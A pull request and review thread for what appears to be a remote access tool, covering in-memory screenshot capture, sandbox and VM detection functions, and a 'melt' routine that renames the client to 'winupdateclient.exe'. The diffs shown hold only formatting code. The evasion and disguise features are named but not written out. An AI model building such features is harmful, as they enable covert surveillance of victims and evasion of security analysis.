### PR TITLE
Improve Screenshotting and formatting

### PR DESCRIPTION
**Pull request by Y4hL**
Screenshot is now saved in memory, this reduces room for Permission errors and such and reduces Client footprint. detectSandboxie() and detectVM() now return bools instead of string, so they can be reused somewhere else

### CODE REVIEW

**Comment by xp4xbox** [comment]
Il review it soon. Can you verify that everything works with no errors?

**Comment by Y4hL** [comment]
Ill test everything now and fix anything that needs fixing

**Comment by Y4hL** [comment]
Everything works now

File: server.py [hunk 1]
```diff
@@ -160,23 +160,23 @@ def refresh_connections():  # used to remove any lost connections
...
 
+    strClients = ""
+    for intCounter, arrAddress in enumerate(arrAddresses):
+        strClients += str(intCounter)
+        for value in arrAddress:
+            strClients += f"{4*' '}{str(value)}"
+        strClients += "\n"
+
+    strInfo = f"\nID{3*' '}"
+    for index, text in enumerate(["IP", "Port", "PC Name", "OS"]):
```
Comment (xp4xbox) [inline server.py:175]: Maybe put a title for the username as well.

File: client.py [hunk 2]
```diff
@@ -158,10 +158,10 @@ def recvall(buffer):  # function to receive large amounts of data
 
 # vbs message box
 def MessageBox(message):
```
Comment (xp4xbox) [inline client.py:160]: This seems to crash the client currently.

**Comment by xp4xbox** [comment]
Other than those two things everything looks good.

File: client.py (hunk 2 above)
Comment (Y4hL) [reply client.py:160]: Did you get an error message? I think it's because of the subprocess pipes i added, not sure though

**Comment by xp4xbox** [comment]
Also can you recheck the melt() function. I tried it and when I test it it makes you confirm UAC prompt and its renamed to the wrong file `winupdateclient.exe`.

**Comment by xp4xbox** [comment]
ok looks good

**Pull request merged**